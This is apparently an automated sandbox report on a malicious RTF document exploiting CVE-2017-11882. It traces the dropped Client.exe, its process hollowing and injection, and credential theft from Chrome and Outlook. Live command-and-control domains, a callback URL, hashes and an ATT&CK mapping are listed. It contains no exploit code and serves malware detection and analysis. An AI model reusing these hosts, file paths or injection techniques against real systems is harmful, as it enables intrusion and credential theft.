Source: Yara match; File source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\NAPSTAT.EXE; Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: C:\Windows\SysWOW64\NAPSTAT.EXE; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

          Remote Access Functionality

Source: Yara match; File source: 9.2.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.notepad.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.notepad.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.notepad.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.2.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.notepad.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.notepad.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.notepad.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.notepad.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.notepad.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 9.0.notepad.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000B.00000002.1174323535.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000000.936456430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.1039869159.00000000002B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000000.936147308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000000.944576873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000000.1155298831.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000000.1152501907.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000D.00000002.1160841001.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000000.1012237175.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.1175159269.0000000000230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.955126906.0000000003696000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000A.00000000.996747059.000000000B4B5000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000B.00000002.1174987416.0000000000200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.1039727888.0000000000150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000000.944868705.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (techniques listed per tactic column; a number before a technique is the report's counter for it)

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 1 Shared Modules; 43 Exploitation for Client Execution; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading; 812 Process Injection; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 3 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 41 Virtualization/Sandbox Evasion; 812 Process Injection
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 File and Directory Discovery; 13 System Information Discovery; 121 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Remote System Discovery; Network Sniffing; Network Service Scanning
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: 1 Archive Collected Data; 1 Man in the Browser; 1 Data from Local System; 1 Email Collection; 1 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: 4 Ingress Tool Transfer; 1 Encrypted Channel; 3 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
Behavior Graph

Behavior Graph ID: 680332; Sample: SecuriteInfo.com.Exploit.Rt...; Startdate: 08/08/2022; Architecture: WINDOWS; Score: 100

Sample
  DNS/IP: www.luanaterra.online; www.hogogala.com
  Signatures: Document contains OLE streams which likely are hidden ActiveX objects; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 10 other signatures
  Started: EQNEDT32.EXE (47); WINWORD.EXE (292, 21)

EQNEDT32.EXE
  Signatures: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  Started: cmd.exe

WINWORD.EXE
  Dropped: C:\Users\user\AppData\Local\Temp\Client.exe, PE32; C:\Users\user\...\Client.exe:Zone.Identifier, ASCII; ~WRF{35F4FC89-AF57...1-CE9C986E155F}.tmp, Composite
  Signatures: Document exploit detected (creates forbidden files)

cmd.exe
  Started: Client.exe

Client.exe
  Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Writes to foreign memory regions; 3 other signatures
  Started: notepad.exe

notepad.exe
  Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
  Injected: explorer.exe

explorer.exe
  DNS/IP: www.magadirect.co.uk 45.33.18.44, 49171, 80 LINODE-APLinodeLLCUS United States
  Signatures: System process connects to network (likely due to code injection or exploit)
  Started: NAPSTAT.EXE (9)

NAPSTAT.EXE
  DNS/IP: www.sqlite.org 45.33.6.223, 49172, 80 LINODE-APLinodeLLCUS United States
  Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
  Started: firefox.exe
Source | Detection | Scanner | Label | Link
SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.rtf | 15% | ReversingLabs | Document-RTF.Trojan.Heuristic |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen |
C:\Users\user\AppData\Local\Temp\Client.exe | 100% | Joe Sandbox ML |  |
C:\Users\user\AppData\Local\Temp\Client.exe | 22% | ReversingLabs | ByteCode-MSIL.Spyware.Noon |

Source | Detection | Scanner | Label | Link | Download
9.0.notepad.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |  | Download File
9.2.notepad.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |  | Download File
9.0.notepad.exe.400000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |  | Download File
9.0.notepad.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |  | Download File
9.0.notepad.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |  | Download File
9.0.notepad.exe.400000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen |  | Download File

No Antivirus matches
Source | Detection | Scanner | Label | Link
http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe |
www.bookmarkfiles.info/aekc/ | 0% | Avira URL Cloud | safe |
http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe |
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe |
http://treyresearch.net | 0% | URL Reputation | safe |
http://java.sun.com | 0% | URL Reputation | safe |
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe |
http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe |
http://www.%s.comPA | 0% | URL Reputation | safe |
http://www.magadirect.co.uk/aekc/?p6A=k0tTOTrAn50YQe1h4ozxDNX4wd5+O6pkKrWAMwmyhhYwJBfC5YpDY/r3FGLgLX7DF3fRHoVtyXQnCSOz0Ea/6qte5rYurCT1UmXBzRE=&xjRt=ZvcPNdzxaTTX6DM | 0% | Avira URL Cloud | safe |
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.hogogala.com | 162.213.253.236 | true | false |  | unknown
www.sqlite.org | 45.33.6.223 | true | false |  | high
www.magadirect.co.uk | 45.33.18.44 | true | true |  | unknown
www.luanaterra.online | unknown | unknown | true |  | unknown

Name | Malicious | Antivirus Detection | Reputation
http://www.sqlite.org/2014/sqlite-dll-win32-x86-3080700.zip | false |  | high
www.bookmarkfiles.info/aekc/ | true | Avira URL Cloud: safe | low
http://www.magadirect.co.uk/aekc/?p6A=k0tTOTrAn50YQe1h4ozxDNX4wd5+O6pkKrWAMwmyhhYwJBfC5YpDY/r3FGLgLX7DF3fRHoVtyXQnCSOz0Ea/6qte5rYurCT1UmXBzRE=&xjRt=ZvcPNdzxaTTX6DM | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.windows.com/pctv. | explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false |  | high
http://investor.msn.com | explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false |  | high
http://www.msnbc.com/news/ticker.txt | explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false |  | high
http://wellformedweb.org/CommentAPI/ | explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.iis.fhg.de/audioPA | explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.piriform.com/ccleanerq | explorer.exe, 0000000A.00000000.1029291046.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.986329833.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.958357895.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1004626983.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp | false |  | high
http://www.piriform.com/ccleaner1SPS0 | explorer.exe, 0000000A.00000000.978377131.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1010833057.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.993943393.0000000008611000.00000004.00000001.00020000.00000000.sdmp | false |  | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false |  | high
http://treyresearch.net | explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | false |  | high
http://java.sun.com | explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.icra.org/vocabulary/. | explorer.exe, 0000000A.00000000.1005424318.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.1030081883.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | explorer.exe, 0000000A.00000000.1001877731.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp | false |  | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 0000000A.00000000.1010360758.0000000008521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.995439916.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979257547.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.950353171.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.994846785.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.979787030.000000000880D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.992888492.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1011293822.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.993114505.0000000008521000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1010156944.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.976835880.00000000084D2000.00000004.00000001.00020000.00000000.sdmp | false |  | high
http://investor.msn.com/ | explorer.exe, 0000000A.00000000.1005046507.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false |  | high
http://www.piriform.com/ccleaner | explorer.exe, 0000000A.00000000.976786692.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1004626983.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp | false |  | high
http://computername/printers/printername/.printer | explorer.exe, 0000000A.00000000.969373511.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false |
                                          • Avira URL Cloud: safe
                                          low
                                          http://www.%s.comPAexplorer.exe, 0000000A.00000000.1001877731.0000000001DD0000.00000002.00000001.00040000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          low
                                          http://www.autoitscript.com/autoit3explorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://support.mozilla.orgexplorer.exe, 0000000A.00000000.998739838.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.949886859.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.983940407.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1027026563.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://www.piriform.com/ccleanervexplorer.exe, 0000000A.00000000.988586812.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.1006236115.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.968187098.0000000004385000.00000004.00000001.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameClient.exe, 00000005.00000002.947458698.0000000002671000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://servername/isapibackend.dllexplorer.exe, 0000000A.00000000.1008328661.0000000006450000.00000002.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  low
IP | Domain | Country | ASN | ASN Name | Malicious
45.33.6.223 | www.sqlite.org | United States | 63949 | LINODE-APLinodeLLCUS | false
45.33.18.44 | www.magadirect.co.uk | United States | 63949 | LINODE-APLinodeLLCUS | true
                                                  Joe Sandbox Version:35.0.0 Citrine
                                                  Analysis ID:680332
Start date and time: 2022-08-08 12:06:10 +02:00
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 9m 2s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Sample file name:SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.12395.1520 (renamed file extension from 1520 to rtf)
                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 14
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:1
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.expl.evad.winRTF@11/9@4/2
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HDC Information:
                                                  • Successful, ratio: 22.2% (good quality ratio 20.9%)
                                                  • Quality average: 69.8%
                                                  • Quality standard deviation: 30%
                                                  HCA Information:
                                                  • Successful, ratio: 79%
                                                  • Number of executed functions: 99
                                                  • Number of non-executed functions: 22
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                  • Attach to Office via COM
                                                  • Scroll down
                                                  • Close Viewer
                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, conhost.exe, svchost.exe
• Not all processes were analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
12:07:15 | API Interceptor | 38x Sleep call for process: EQNEDT32.EXE modified
12:07:17 | API Interceptor | 176x Sleep call for process: Client.exe modified
12:07:39 | API Interceptor | 6x Sleep call for process: notepad.exe modified
12:08:23 | API Interceptor | 356x Sleep call for process: NAPSTAT.EXE modified
12:09:04 | API Interceptor | 1x Sleep call for process: explorer.exe modified
Match: 45.33.18.44 (associated samples seen contacting this IP; columns: Associated Sample Name / URL, Detection, Context)
• Sample: https://storagefile.michaelangelo.lk/ | Detection: malicious | Context: www.bobdole.com/favicon.ico
• Sample: $$$.exe | Detection: malicious | Context: www.pavlonmedia.net/jdt0/?9rJx9rLP=kc640COIAz2+5qh36BYYmICu2Hu7e0PvVi7X4Boou2YN7sc8h4oT1TZhD0bctlnOtETx&WBTxb=6ltXP
• Sample: Z14S9Zolcyub1pd.exe | Detection: malicious | Context: www.pavlonmedia.net/jdt0/?YPyd=kc640COIAz2+5qh36BYYmICu2Hu7e0PvVi7X4Boou2YN7sc8h4oT1TZhD37m90H23jy2&Z8atc=2dtlDXLP5h8H2Zg0
• Sample: Technical Specs_Docs_Rev0.exe | Detection: malicious | Context: www.whiskeyandlaceboutque.com/ik0y/?Y0G8X8=5QdEhVILyddfgJdEFzxORhJ7/5Mhh1yOMYp1N8Rq4rjOVALdP2q071r7l7vA+mUmoS51&jtxt=ZDKTxBDPgJx8aJvP
• Sample: 8XLHJB41D3.exe | Detection: malicious | Context: gorokborotun782699.com/status.php
• Sample: niO15eMewi.exe | Detection: malicious | Context: gorokborotun782699.com/status.php
• Sample: Failure Notice Details PDF.exe | Detection: malicious | Context: www.loginstrongmind.com/j6xw/?pR-xqjW=et2tM9NHPBPshdQ8qZwsvlPOoWCSjHldMzAIoHMMJxkpwYJ2ooWAlmwy099Eo1/t2+Ay&srL4=IdpX_hpxaNVLNhX
• Sample: bd729c36_by_Libranalysis.exe | Detection: malicious | Context: www.electricmotorcyclecollector.com/nt8e/?vZR=c/Zsv+lQ7zYnTxBG+cfc1H6mNoLtAs74Xv2n5d9M/VbMRGJLPC//X5gl/LyBPev+0zXyVm/1ww==&W6=GtSP
                                                  No context
Match: LINODE-APLinodeLLCUS (associated samples seen in this ASN; columns: Associated Sample Name / URL, Detection, Context)
• Sample: ZeVrhBGYOS | Detection: malicious | Context: 198.58.123.77
• Sample: 4mwq2EIQH0 | Detection: malicious | Context: 198.58.123.77
• Sample: fxVwqXFgQo | Detection: malicious | Context: 198.58.123.77
• Sample: HRn4JURL9w | Detection: malicious | Context: 198.58.123.77
• Sample: y65AMsMeBN | Detection: malicious | Context: 198.58.123.77
• Sample: 2mAvpFLk7S | Detection: malicious | Context: 198.58.123.77
• Sample: x43Z94WJyR | Detection: malicious | Context: 198.58.123.77
• Sample: c3dUDCQVAQ | Detection: malicious | Context: 198.58.123.77
• Sample: 8mqKJqW7RC | Detection: malicious | Context: 198.58.123.77
• Sample: HxY0Wguqyn | Detection: malicious | Context: 198.58.123.77
• Sample: g4tAXaUuYE | Detection: malicious | Context: 198.58.123.77
• Sample: B1kefW3SOZ | Detection: malicious | Context: 139.162.225.162
• Sample: MA3byFPsuw | Detection: malicious | Context: 65.19.178.224
• Sample: https://adclick.g.doubleclick.net/pcs/click?adurl=https://550418.secure.micomya.com/./outlook.office.com/mail/inbox/id/thall/op-f/77468616c6c406f702d662e6f7267#dGhhbGxAb3AtZi5vcmc | Detection: malicious | Context: 109.237.27.102
• Sample: 1.exe | Detection: malicious | Context: 172.104.187.4
• Sample: CDXkaVYU19.exe | Detection: malicious | Context: 198.58.106.108
• Sample: 04qb2qseWz.exe | Detection: malicious | Context: 198.58.118.167
• Sample: list049.exe | Detection: malicious | Context: 139.162.30.170
• Sample: product_list_95849.exe | Detection: malicious | Context: 139.162.30.170
• Sample: jYmrvNEQmF | Detection: malicious | Context: 173.255.209.102
                                                  No context
                                                  No context
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                  Category:dropped
                                                  Size (bytes):962560
                                                  Entropy (8bit):7.212114876878578
                                                  Encrypted:false
                                                  SSDEEP:12288:rH/hLzLfhhDL1RJj2Y77Jk0dMjLA3PFqO8vUMFsPwBjA32fBE:b/N5hDLr5dk02j8FkvHBjAYE
                                                  MD5:426E7D731C2BA1BD9534EB8F737CDEAF
                                                  SHA1:C6DDBF5EC6281C716B47BE2F043B2E6ACDEF3CF4
                                                  SHA-256:A59D7D77C0A6B59BEA96AD8E4D32B42AD1EC4DEEC31590940CC0A373978C2E2D
                                                  SHA-512:165520C163AAFCFECD5DF204D2CD2805B0D180C0864A666365AF06DB470398C9D29B1C035DFA217B22630E930420697562830989F67EBB0C6F1B2DA0E2A8B5F8
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: rtf_cve2017_11882_ole, Description: Attempts to identify the exploit CVE 2017 11882, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp, Author: John Davison
                                                  • Rule: EXP_potential_CVE_2017_11882, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{35F4FC89-AF57-47A0-AA61-CE9C986E155F}.tmp, Author: ReversingLabs
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  Reputation:low
                                                  Preview:......................>...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R...Q........................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):1.1722028273607172
                                                  Encrypted:false
                                                  SSDEEP:6:beKNc1ElClXiKNgREqAWlgFJYm7KmrRmvlw5Fr+ur8FrK:beOc1MClXiOk5uFJd5Rmvq5ZP8ZK
                                                  MD5:75FCAEF5B6C0ADE6AF66F49874853C6A
                                                  SHA1:834FA72EEF104773D7052895798FED035EF01594
                                                  SHA-256:01E456476480AA1FD27ACF8F02AEA30D9B09581579A029154A6CD2A6850C85A0
                                                  SHA-512:5E7DBBEB9534660466B7ACD9E70725504C33CC435C08D30ECE035B7CC13F5DC8AAB73F8CA16AA562697063059FEC3C5EE8258F108EB68C8B1071DD381FEDB99A
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
